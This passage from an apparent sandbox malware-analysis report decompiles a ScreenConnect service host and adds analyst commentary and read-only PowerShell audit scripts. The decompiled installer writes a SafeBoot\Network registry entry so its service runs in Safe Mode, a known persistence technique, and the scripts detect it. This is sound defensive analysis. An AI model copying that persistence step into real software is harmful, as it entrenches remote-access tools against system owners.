                                                                          					E003F1020(_t228, 0x8007000e);
                                                                          				}
                                                                          				__imp__#26(_v1072, _t264,  &_v1120);
                                                                          				 *_t258( &_v1120);
                                                                          				_t265 = __imp__#8;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				asm("movdqu [ebp-0x47c], xmm0");
                                                                          				 *_t265( &_v1152);
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v1068 = _v1096;
                                                                          				asm("movdqu [ebp-0x45c], xmm0");
                                                                          				_t175 =  *_t265( &_v1120);
                                                                          				_v8 = 0xa;
                                                                          				asm("movdqu xmm0, [ebp-0x45c]");
                                                                          				asm("movdqu [ebp-0x48c], xmm0");
                                                                          				__imp__#2(L"LoadFrom");
                                                                          				_t266 = _t175;
                                                                          				_v1124 = _t266;
                                                                          				if(_t266 == 0) {
                                                                          					E003F1020(_t228, 0x8007000e);
                                                                          				}
                                                                          				_v8 = 0xb;
                                                                          				_t253 = _v1068;
                                                                          				asm("movdqu xmm0, [ebp-0x48c]");
                                                                          				_t229 =  *_t253;
                                                                          				asm("movdqu [eax], xmm0"); // executed
                                                                          				_t178 =  *((intOrPtr*)( *_t253 + 0xe4))(_t253, _t266, 0x118, 0, _v1072,  &_v1152);
                                                                          				_v1068 = _t178;
                                                                          				__imp__#6(_t266);
                                                                          				 *_t258( &_v1120);
                                                                          				if(_v1068 >= 0) {
                                                                          					_t269 = _v1144;
                                                                          					_v1124 = _t269;
                                                                          					_v1084 = 0;
                                                                          					_t197 =  &_v1064;
                                                                          					_v8 = 0xd;
                                                                          					__imp__#2(_t197);
                                                                          					_t260 = _t197;
                                                                          					_v1072 = _t260;
                                                                          					if(_t260 == 0) {
                                                                          						E003F1020(_t229, 0x8007000e);
                                                                          					}
                                                                          					_v8 = 0xe;
                                                                          					 *((intOrPtr*)( *_t269 + 0x44))(_t269, _t260,  &_v1084);
                                                                          					_v8 = 0xd;
                                                                          					__imp__#6(_t260);
                                                                          					_t253 = _v1132;
                                                                          					_t200 = E003F10A0(_v1084, _v1132, 0, _v1128); // executed
                                                                          					_v8 = 0xc;
                                                                          					_t242 = _v1084;
                                                                          					_v1068 = _t200;
                                                                          					if(_t242 != 0) {
                                                                          						_t253 =  *_t242;
                                                                          						 *((intOrPtr*)( *_t242 + 8))(_t242);
                                                                          					}
                                                                          					_v8 = 9;
                                                                          					if(_t269 != 0) {
                                                                          						 *((intOrPtr*)( *_t269 + 8))(_t269);
                                                                          					}
                                                                          					_t258 = __imp__#9;
                                                                          				}
                                                                          				 *_t258( &_v1152);
                                                                          				_v8 = 6;
                                                                          				_t183 = _v1096;
                                                                          				if(_t183 != 0) {
                                                                          					 *((intOrPtr*)( *_t183 + 8))(_t183);
                                                                          				}
                                                                          				_v8 = 5;
                                                                          				_t184 = _v1100;
                                                                          				if(_t184 != 0) {
                                                                          					 *((intOrPtr*)( *_t184 + 8))(_t184);
                                                                          				}
                                                                          				_v8 = 4;
                                                                          				_t185 = _v1088;
                                                                          				if(_t185 != 0) {
                                                                          					 *((intOrPtr*)( *_t185 + 8))(_t185);
                                                                          				}
                                                                          				_v8 = 3;
                                                                          				_t186 = _v1092;
                                                                          				if(_t186 != 0) {
                                                                          					 *((intOrPtr*)( *_t186 + 8))(_t186);
                                                                          				}
                                                                          				_v8 = 0;
                                                                          				_t187 = _v1080;
                                                                          				if(_t187 != 0) {
                                                                          					 *((intOrPtr*)( *_t187 + 8))(_t187);
                                                                          				}
                                                                          				_v8 = 0xffffffff;
                                                                          				_t188 = _v1076;
                                                                          				if(_t188 != 0) {
                                                                          					 *((intOrPtr*)( *_t188 + 8))(_t188);
                                                                          				}
                                                                          				 *[fs:0x0] = _v16;
                                                                          				_pop(_t259);
                                                                          				_pop(_t268);
                                                                          				return E003F1B07(_t217, _v24 ^ _t270, _t253, _t259, _t268);
                                                                          			}

                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(mscoree.dll,A8642A1F), ref: 003F11A1
                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 003F11AD
                                                                          • CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00402734,00402714,00000000), ref: 003F1286
                                                                          • SysAllocString.OLEAUT32(System.Reflection.Assembly), ref: 003F1339
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F136C
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 003F1374
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003F1387
                                                                          • PathRemoveExtensionW.SHLWAPI(?), ref: 003F1394
                                                                          • PathFindFileNameW.SHLWAPI(?), ref: 003F13A1
                                                                          • StrCpyW.SHLWAPI(?,00000000), ref: 003F13B5
                                                                          • StrCpyW.SHLWAPI(?,.dll), ref: 003F13DE
                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 003F13E6
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1422
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F1441
                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 003F147F
                                                                          • VariantClear.OLEAUT32(?), ref: 003F148C
                                                                          • VariantInit.OLEAUT32(?), ref: 003F14A6
                                                                          • VariantInit.OLEAUT32(?), ref: 003F14C6
                                                                          • SysAllocString.OLEAUT32(LoadFrom), ref: 003F14E1
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F153D
                                                                          • VariantClear.OLEAUT32(?), ref: 003F154A
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F157B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F15AE
                                                                          • VariantClear.OLEAUT32(?), ref: 003F160B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: String$Variant$AllocClear$Free$ArrayFileInitModuleNamePathSafe$AddressBindCreateElementExtensionFindHandleLibraryLoadProcRemoveRuntimeVector
                                                                          • String ID: .dll$CLRCreateInstance$LoadFrom$System.Reflection.Assembly$mscoree.dll$v4.0.30319
                                                                          • API String ID: 867853067-1843332998
                                                                          • Opcode ID: 45ea4295470ec3f72bd01964f8b89d09530464a602b8a467609be783a0b807da
                                                                          • Instruction ID: d732d9cfbac88209a675b86f3277b7f6def34db9c6c74d324bf6bae78d7e6e3f
                                                                          • Opcode Fuzzy Hash: 45ea4295470ec3f72bd01964f8b89d09530464a602b8a467609be783a0b807da
                                                                          • Instruction Fuzzy Hash: 2DF180B0A00358DFDB21DBA4CD48BADBBB8AF49304F1441D9E608E7291DB759E84CF65
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 60%
                                                                          			E003F1880() {
                                                                          				signed int _v8;
                                                                          				signed int _v16;
                                                                          				char _v40;
                                                                          				void* _v56;
                                                                          				intOrPtr _v64;
                                                                          				struct _SERVICE_STATUS _v68;
                                                                          				int _v72;
                                                                          				intOrPtr _v76;
                                                                          				struct _SERVICE_TABLE_ENTRY _v80;
                                                                          				void* _v88;
                                                                          				short* _v96;
                                                                          				char _v100;
                                                                          				char _v104;
                                                                          				void* _v108;
                                                                          				void* _v112;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t34;
                                                                          				int _t37;
                                                                          				void* _t42;
                                                                          				short* _t47;
                                                                          				void* _t52;
                                                                          				void* _t68;
                                                                          				void* _t75;
                                                                          				void* _t77;
                                                                          				void* _t78;
                                                                          				void* _t79;
                                                                          				void* _t81;
                                                                          				void* _t83;
                                                                          				void* _t84;
                                                                          				signed int _t88;
                                                                          				signed int _t90;
                                                                          
                                                                          				_t90 = (_t88 & 0xfffffff0) - 0x68;
                                                                          				_t34 =  *0x404000; // 0xa8642a1f
                                                                          				_v8 = _t34 ^ _t90;
                                                                          				_v80 = 0x40259c;
                                                                          				_v76 = E003F1700;
                                                                          				_v72 = 0;
                                                                          				_v68 = 0;
                                                                          				_t37 = StartServiceCtrlDispatcherW( &_v80); // executed
                                                                          				if(_t37 != 0) {
                                                                          					L16:
                                                                          					_pop(_t77);
                                                                          					_pop(_t81);
                                                                          					return E003F1B07(_t68, _v8 ^ _t90, _t75, _t77, _t81);
                                                                          				} else {
                                                                          					asm("xorps xmm0, xmm0");
                                                                          					asm("movdqa [esp+0x14], xmm0");
                                                                          					__imp__#8( &_v100);
                                                                          					_t42 = E003F1160(_t68, L"GetServiceName",  &_v104);
                                                                          					_t90 = _t90 + 4;
                                                                          					if(_t42 < 0) {
                                                                          						L14:
                                                                          						__imp__#9( &_v104);
                                                                          						_pop(_t78);
                                                                          						_pop(_t83);
                                                                          						return E003F1B07(_t68, _v16 ^ _t90, _t75, _t78, _t83);
                                                                          					} else {
                                                                          						_t84 = OpenSCManagerW(0, 0, 0x10000000);
                                                                          						_v88 = _t84;
                                                                          						_t47 = OpenServiceW(_t84, _v96, 0x10000000);
                                                                          						_t79 = _t47;
                                                                          						if(_t79 == 0) {
                                                                          							_t79 = CreateServiceW(_t84, _v96, _t79, 0xf01ff, 0x10, 2, 1, GetCommandLineW(), _t47, _t47, _t47, _t47, 0x40259c);
                                                                          						}
                                                                          						RegOpenKeyW(0x80000002, L"System\\CurrentControlSet\\Control\\SafeBoot\\Network",  &_v108);
                                                                          						RegOpenKeyW(_v108, _v96,  &_v112);
                                                                          						_t52 = _v112;
                                                                          						if(_t52 == 0) {
                                                                          							RegCreateKeyW(_v108, _v96,  &_v112);
                                                                          							_t52 = _v112;
                                                                          						}
                                                                          						asm("movdqu xmm0, [0x402704]");
                                                                          						asm("movdqu [esp+0x68], xmm0");
                                                                          						RegSetValueExW(_t52, 0, 0, 1,  &_v40, 0x10);
                                                                          						if(QueryServiceStatus(_t79,  &_v68) != 0 && _v64 != 4) {
                                                                          							StartServiceW(_t79, 0, 0);
                                                                          						}
                                                                          						if(QueryServiceStatus(_t79,  &_v68) != 0) {
                                                                          							while(_v64 == 2) {
                                                                          								Sleep(0x14);
                                                                          								if(QueryServiceStatus(_t79,  &_v68) != 0) {
                                                                          									continue;
                                                                          								}
                                                                          								goto L12;
                                                                          							}
                                                                          						}
                                                                          						L12:
                                                                          						CloseServiceHandle(_t79);
                                                                          						CloseServiceHandle(_v88);
                                                                          						if(_v64 == 4) {
                                                                          							__imp__#9( &_v104);
                                                                          							goto L16;
                                                                          						} else {
                                                                          							goto L14;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • StartServiceCtrlDispatcherW.ADVAPI32(?,?,?), ref: 003F18BB
                                                                          • VariantInit.OLEAUT32(?), ref: 003F18D7
                                                                            • Part of subcall function 003F1160: LoadLibraryW.KERNEL32(mscoree.dll,A8642A1F), ref: 003F11A1
                                                                            • Part of subcall function 003F1160: GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 003F11AD
                                                                            • Part of subcall function 003F1160: CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00402734,00402714,00000000), ref: 003F1286
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,10000000), ref: 003F1902
                                                                          • OpenServiceW.ADVAPI32(00000000,?,10000000), ref: 003F1918
                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,0040259C), ref: 003F192D
                                                                          • CreateServiceW.ADVAPI32(00000000,?,00000000,000F01FF,00000010,00000002,00000001,00000000), ref: 003F1945
                                                                          • RegOpenKeyW.ADVAPI32(80000002,System\CurrentControlSet\Control\SafeBoot\Network,?), ref: 003F1962
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 003F1971
                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 003F1988
                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000010), ref: 003F19AE
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19C0
                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 003F19D2
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19DE
                                                                          • Sleep.KERNEL32(00000014), ref: 003F19ED
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19F9
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 003F1A06
                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 003F1A0C
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1A1E
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1A3E
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\SafeBoot\Network, xrefs: 003F1958
                                                                          • GetServiceName, xrefs: 003F18E1
                                                                          • Service, xrefs: 003F1992
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Open$QueryStatusVariant$ClearCloseCreateHandleStart$AddressBindCommandCtrlDispatcherInitLibraryLineLoadManagerProcRuntimeSleepValue
                                                                          • String ID: GetServiceName$Service$System\CurrentControlSet\Control\SafeBoot\Network
                                                                          • API String ID: 1169258217-68844702
                                                                          • Opcode ID: 8270cdbf3dd792c6a882069f6e7b895e5eec9cb0a69a216337f1a07af0a277ff
                                                                          • Instruction ID: ee98c969d6dcfd326881fbf0cebba79d0fb4d436384bda5376600173407f07d1
                                                                          • Opcode Fuzzy Hash: 8270cdbf3dd792c6a882069f6e7b895e5eec9cb0a69a216337f1a07af0a277ff
                                                                          • Instruction Fuzzy Hash: 7D51867150430AEFD612DB61DD49F7B7BECEB88715F000919FA84D6160DBB0E904CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
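Reading the routine above: after obtaining the service name through the managed GetServiceName call, it opens the SCM and the service with GENERIC_ALL (0x10000000) and, if OpenServiceW fails, calls CreateServiceW with SERVICE_ALL_ACCESS (0xF01FF), SERVICE_WIN32_OWN_PROCESS (0x10), SERVICE_AUTO_START (2) and SERVICE_ERROR_NORMAL (1), passing its own command line (GetCommandLineW) as the binary path. It then creates a subkey named after the service under HKLM\System\CurrentControlSet\Control\SafeBoot\Network and writes the REG_SZ default value "Service" (value type 1, 0x10 bytes: "Service" plus the UTF-16 terminator; the string is the "Service" xref at 003F1992). A subkey of that form is what makes Windows load the service in Safe Mode with Networking, which is the behaviour the report flags as an undocumented autostart key. Finally it starts the service and polls QueryServiceStatus every 20 ms (Sleep(0x14)) while dwCurrentState is SERVICE_START_PENDING (2), treating SERVICE_RUNNING (4) as success.

The PowerShell below is an added example, not code from the report or from ScreenConnect. It audits both SafeBoot lists on a live host and flags entries that have no matching service key or whose binary does not carry a valid Authenticode signature. The function name and the handling of quoted or argument-bearing ImagePath values are my own; it is read-only and should be run from an elevated session.

```powershell
# Added example: audit the Safe Mode service lists and cross-check them against the
# installed services. Not code from the sandbox report or from ScreenConnect.
# Read-only; run from an elevated PowerShell session on the host being examined.

function Get-SafeBootServiceEntry {
    [CmdletBinding()]
    param(
        # Which Safe Mode list(s) to inspect. The decompiled installer writes to Network.
        [ValidateSet('Minimal', 'Network')]
        [string[]] $List = @('Minimal', 'Network')
    )

    $svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

    foreach ($l in $List) {
        $root = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\$l"
        foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
            $name = $key.PSChildName
            # The subkey's default value is "Service" for a service, "Driver" for a driver,
            # and a class description for device-class GUID entries. Keep services only,
            # which is the kind of entry the installer above creates.
            $kind = (Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue).'(default)'
            if ($kind -ne 'Service') { continue }

            $svc   = Get-ItemProperty -LiteralPath (Join-Path $svcRoot $name) -ErrorAction SilentlyContinue
            $image = $null
            $sig   = 'n/a'
            if ($svc -and $svc.ImagePath) {
                # ImagePath may be quoted, may carry arguments (as a command line copied
                # from GetCommandLineW does) and may use %SystemRoot%; reduce it to the
                # executable so its Authenticode signature can be checked.
                $expanded = [Environment]::ExpandEnvironmentVariables($svc.ImagePath)
                if     ($expanded -match '^"([^"]+)"')         { $image = $Matches[1] }
                elseif ($expanded -match '^(\S+?\.(exe|sys))')  { $image = $Matches[1] }
                else                                            { $image = $expanded.Trim() }
                if (-not [IO.Path]::IsPathRooted($image)) {
                    $image = Join-Path $env:SystemRoot $image
                }
                if (Test-Path -LiteralPath $image) {
                    $sig = (Get-AuthenticodeSignature -FilePath $image).Status
                }
            }
            $start = if ($svc) { $svc.Start } else { $null }

            [pscustomobject]@{
                List       = $l
                Entry      = $name
                HasService = [bool]$svc
                StartType  = $start
                ImagePath  = $image
                Signature  = $sig
            }
        }
    }
}

# Anything that sits in a SafeBoot list but has no service key, or whose binary does
# not carry a valid signature, deserves a look; the entries Windows ships there
# resolve to Microsoft-signed binaries.
Get-SafeBootServiceEntry |
    Where-Object { -not $_.HasService -or $_.Signature -ne 'Valid' } |
    Format-Table -AutoSize
```

Two caveats: svchost-hosted services report svchost.exe as their image, so the DLL they actually run (Parameters\ServiceDll) is not checked here, and a service registered only under SafeBoot\Minimal would be missed if the list is restricted to Network, so leave the default of both lists unless you have a reason not to.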

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 42%
                                                                          			E003F1700(void* __ebx, void* __edx) {
                                                                          				char _v16;
                                                                          				signed int _v24;
                                                                          				struct _SECURITY_ATTRIBUTES* _v28;
                                                                          				intOrPtr _v40;
                                                                          				signed int _v48;
                                                                          				short _v548;
                                                                          				short _v552;
                                                                          				char* _v564;
                                                                          				char* _v568;
                                                                          				char* _v572;
                                                                          				struct _SECURITY_ATTRIBUTES* _v600;
                                                                          				struct _SECURITY_ATTRIBUTES* _v604;
                                                                          				intOrPtr _v608;
                                                                          				struct _SECURITY_ATTRIBUTES* _v612;
                                                                          				struct _SERVICE_STATUS _v616;
                                                                          				struct _SERVICE_STATUS _v620;
                                                                          				char _v644;
                                                                          				char _v648;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t33;
                                                                          				signed int _t35;
                                                                          				int _t45;
                                                                          				void* _t62;
                                                                          				int _t65;
                                                                          				void* _t67;
                                                                          				signed int _t69;
                                                                          				signed int _t71;
                                                                          				void* _t72;
                                                                          				signed int _t73;
                                                                          				signed int _t75;
                                                                          				signed int _t76;
                                                                          
                                                                          				_t62 = __edx;
                                                                          				_push(0xffffffff);
                                                                          				_push(E003FD26B);
                                                                          				_push( *[fs:0x0]);
                                                                          				_t75 = (_t73 & 0xfffffff0) - 0x26c;
                                                                          				_t33 =  *0x404000; // 0xa8642a1f
                                                                          				_v24 = _t33 ^ _t75;
                                                                          				_t35 =  *0x404000; // 0xa8642a1f
                                                                          				_push(_t35 ^ _t75);
                                                                          				 *[fs:0x0] =  &_v16;
                                                                          				_t69 = 0;
                                                                          				_v572 = L"Stop";
                                                                          				_v568 = L"SessionChange";
                                                                          				_v564 = L"Shutdown";
                                                                          				do {
                                                                          					E003F1C97(GetCurrentProcessId(),  &_v548, 0x104, 0xa);
                                                                          					_t75 = _t75 + 0x10;
                                                                          					StrCatW( &_v548,  *(_t75 + _t69 + 0x4c));
                                                                          					 *((intOrPtr*)(_t75 + _t69 + 0x58)) = CreateEventW(0, 1, 0,  &_v552);
                                                                          					_t69 = _t69 + 4;
                                                                          				} while (_t69 < 0xc);
                                                                          				_t45 =  &_v564;
                                                                          				__imp__RegisterServiceCtrlHandlerExW(0, E003F16B0, _t45);
                                                                          				_t65 = _t45;
                                                                          				_v616 = 0x10;
                                                                          				_v600 = 0;
                                                                          				_v604 = 0;
                                                                          				_v612 = 4;
                                                                          				_v608 = 0x85;
                                                                          				SetServiceStatus(_t65,  &_v616); // executed
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				asm("movdqa [esp+0x18], xmm0");
                                                                          				__imp__#8( &_v644);
                                                                          				_v28 = 0;
                                                                          				E003F1160(__ebx, L"Run",  &_v648); // executed
                                                                          				_t76 = _t75 + 4;
                                                                          				_v616 = 1;
                                                                          				_v612 = 0;
                                                                          				SetServiceStatus(_t65,  &_v620);
                                                                          				_t71 = 0;
                                                                          				do {
                                                                          					CloseHandle( *(_t76 + 0x58 + _t71 * 4));
                                                                          					_t71 = _t71 + 1;
                                                                          				} while (_t71 < 3);
                                                                          				__imp__#9( &_v648);
                                                                          				 *[fs:0x0] = _v40;
                                                                          				_pop(_t67);
                                                                          				_pop(_t72);
                                                                          				return E003F1B07(__ebx, _v48 ^ _t76, _t62, _t67, _t72);
                                                                          			}

                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,00000104,0000000A), ref: 003F176C
                                                                          • __itow_s.LIBCMT ref: 003F176F
                                                                            • Part of subcall function 003F1C97: _xtow_s@20.LIBCMT ref: 003F1CB9
                                                                          • StrCatW.SHLWAPI(?,?), ref: 003F1780
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,?,?,A8642A1F), ref: 003F1791
                                                                          • RegisterServiceCtrlHandlerExW.ADVAPI32(00000000,Function_000016B0,?,?,A8642A1F), ref: 003F17AF
                                                                          • SetServiceStatus.SECHOST(?,?,?,?,00000000,?), ref: 003F17EB
                                                                          • VariantInit.OLEAUT32(?), ref: 003F17FB
                                                                          • SetServiceStatus.ADVAPI32(00000000,?), ref: 003F1834
                                                                          • CloseHandle.KERNEL32(?), ref: 003F1844
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1851
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: Service$StatusVariant$ClearCloseCreateCtrlCurrentEventHandleHandlerInitProcessRegister__itow_s_xtow_s@20
                                                                          • String ID: <&@$H&@$Run$d&@$pGWv
                                                                          • API String ID: 3663874838-1630455827
                                                                          • Opcode ID: cf4a9d600712be9c66b8731ea79181e31d8df4cc92150c757bf7c3dc86d65007
                                                                          • Instruction ID: bec448340e178f0f4982f56612f9f26ed73947e950b14d2a3fa960d2108be2a2
                                                                          • Opcode Fuzzy Hash: cf4a9d600712be9c66b8731ea79181e31d8df4cc92150c757bf7c3dc86d65007
                                                                          • Instruction Fuzzy Hash: 6C41C0B14083449FD321DF64DD48B6BBBECFB89714F40092EFA81972A0DBB5A804CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
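E003F1700 is the service's ServiceMain. It converts the current PID to decimal (__itow_s with radix 0xa into a 0x104-character buffer), appends "Stop", "SessionChange" and "Shutdown" in turn with StrCatW, and creates a manual-reset event (CreateEventW with bManualReset = 1) under each resulting name. It registers E003F16B0 as the control handler via RegisterServiceCtrlHandlerExW and reports a SERVICE_STATUS of SERVICE_WIN32_OWN_PROCESS (0x10), SERVICE_RUNNING (4) and dwControlsAccepted 0x85, which is SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_SESSIONCHANGE. It then calls E003F1160 with "Run"; per the subcall APIs listed for that function (LoadLibraryW mscoree.dll, GetProcAddress CLRCreateInstance, CorBindToRuntimeEx) this native stub hosts the CLR and hands control to a managed Run method for the lifetime of the service. When that returns it reports SERVICE_STOPPED (1) with no controls accepted and closes the three event handles. The decompiler's frame tracking is unreliable around the stack adjustments after those calls, which is why the status struct appears as both _v616 and _v620 and the name buffer as both _v548 and _v552.

The PowerShell below is an added example, not code from the report or from ScreenConnect. Given the PID of the running service process it probes for those three named events through OpenEvent, which gives a cheap runtime fingerprint of this service host. That the object name is exactly the decimal PID followed by the suffix is an inference from the __itow_s/StrCatW sequence, not a fact the report states; the Global\ prefix reflects that a session-0 service's unqualified object names live in the global namespace.

```powershell
# Added example: probe for the per-process control events the decompiled ServiceMain
# creates. Not code from the sandbox report or from ScreenConnect. Assumes the event
# names are the decimal PID followed by "Stop", "SessionChange" or "Shutdown".

if (-not ('Win32.Evt' -as [type])) {
    Add-Type -Namespace Win32 -Name Evt -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr OpenEvent(uint dwDesiredAccess, bool bInheritHandle, string lpName);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
}

function Test-ServiceControlEvent {
    [CmdletBinding()]
    param(
        # PID of the service process to probe, e.g. from Get-Process or Get-CimInstance Win32_Service.
        [Parameter(Mandatory)] [int] $ProcessId
    )
    $SYNCHRONIZE = 0x00100000   # least access that still tells us whether the object exists

    foreach ($suffix in 'Stop', 'SessionChange', 'Shutdown') {
        # The service creates the events without a namespace prefix. It runs in session 0,
        # whose unqualified names are the global namespace, so from an interactive session
        # they are addressed as Global\<name>.
        $name = "Global\$ProcessId$suffix"
        $h    = [Win32.Evt]::OpenEvent($SYNCHRONIZE, $false, $name)
        $err  = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        $present = $h -ne [IntPtr]::Zero
        if ($present) { [void][Win32.Evt]::CloseHandle($h) }
        # 2 = ERROR_FILE_NOT_FOUND (no such object); 5 = ERROR_ACCESS_DENIED means the
        # object exists but the caller lacks SYNCHRONIZE on it, so re-run elevated.
        $code = if ($present) { 0 } else { $err }

        [pscustomobject]@{
            Event      = $name
            Present    = $present
            Win32Error = $code
        }
    }
}

# Example call against a running service process (substitute the real PID):
# Test-ServiceControlEvent -ProcessId 1234 | Format-Table -AutoSize
```

All three events present for a PID that belongs to a service process is consistent with this host; one or two present, or a different naming scheme, is not, so treat the result as corroboration alongside the service configuration and the SafeBoot entry rather than as proof on its own.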

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 88%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                          				intOrPtr _t17;
                                                                          				void* _t18;
                                                                          				void* _t19;
                                                                          				intOrPtr _t23;
                                                                          				void* _t24;
                                                                          				void* _t25;
                                                                          				void* _t26;
                                                                          				void* _t27;
                                                                          				intOrPtr _t28;
                                                                          				signed int _t39;
                                                                          				void* _t49;
                                                                          				signed int _t52;
                                                                          				void* _t54;
                                                                          				void* _t56;
                                                                          
                                                                          				_t50 = __edi;
                                                                          				_t49 = __edx;
                                                                          				E003F3894();
                                                                          				_push(0x14);
                                                                          				_push(0x402af0);
                                                                          				E003F2690(__ebx, __edi, __esi);
                                                                          				_t52 = E003F3A7B() & 0x0000ffff;
                                                                          				E003F3847(2);
                                                                          				_t56 =  *0x3f0000 - 0x5a4d; // 0x5a4d
                                                                          				if(_t56 == 0) {
                                                                          					_t17 =  *0x3f003c; // 0x100
                                                                          					__eflags =  *((intOrPtr*)(_t17 + 0x3f0000)) - 0x4550;
                                                                          					if( *((intOrPtr*)(_t17 + 0x3f0000)) != 0x4550) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						__eflags =  *((intOrPtr*)(_t17 + 0x3f0018)) - 0x10b;
                                                                          						if( *((intOrPtr*)(_t17 + 0x3f0018)) != 0x10b) {
                                                                          							goto L2;
                                                                          						} else {
                                                                          							_t39 = 0;
                                                                          							__eflags =  *((intOrPtr*)(_t17 + 0x3f0074)) - 0xe;
                                                                          							if( *((intOrPtr*)(_t17 + 0x3f0074)) > 0xe) {
                                                                          								__eflags =  *(_t17 + 0x3f00e8);
                                                                          								_t6 =  *(_t17 + 0x3f00e8) != 0;
                                                                          								__eflags = _t6;
                                                                          								_t39 = 0 | _t6;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L2:
                                                                          					_t39 = 0;
                                                                          				}
                                                                          				 *(_t54 - 0x1c) = _t39;
                                                                          				_t18 = E003F226C();
                                                                          				_t57 = _t18;
                                                                          				if(_t18 == 0) {
                                                                          					E003F1F58(0x1c);
                                                                          				}
                                                                          				_t19 = E003F2FD6(_t39, _t50, _t57);
                                                                          				_t58 = _t19;
                                                                          				if(_t19 == 0) {
                                                                          					_t19 = E003F1F58(0x10);
                                                                          				}
                                                                          				E003F3930(_t19);
                                                                          				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                          				if(E003F3069(_t39, _t50, _t52, _t58) < 0) {
                                                                          					E003F1F58(0x1b);
                                                                          				}
                                                                          				 *0x40703c = GetCommandLineA(); // executed
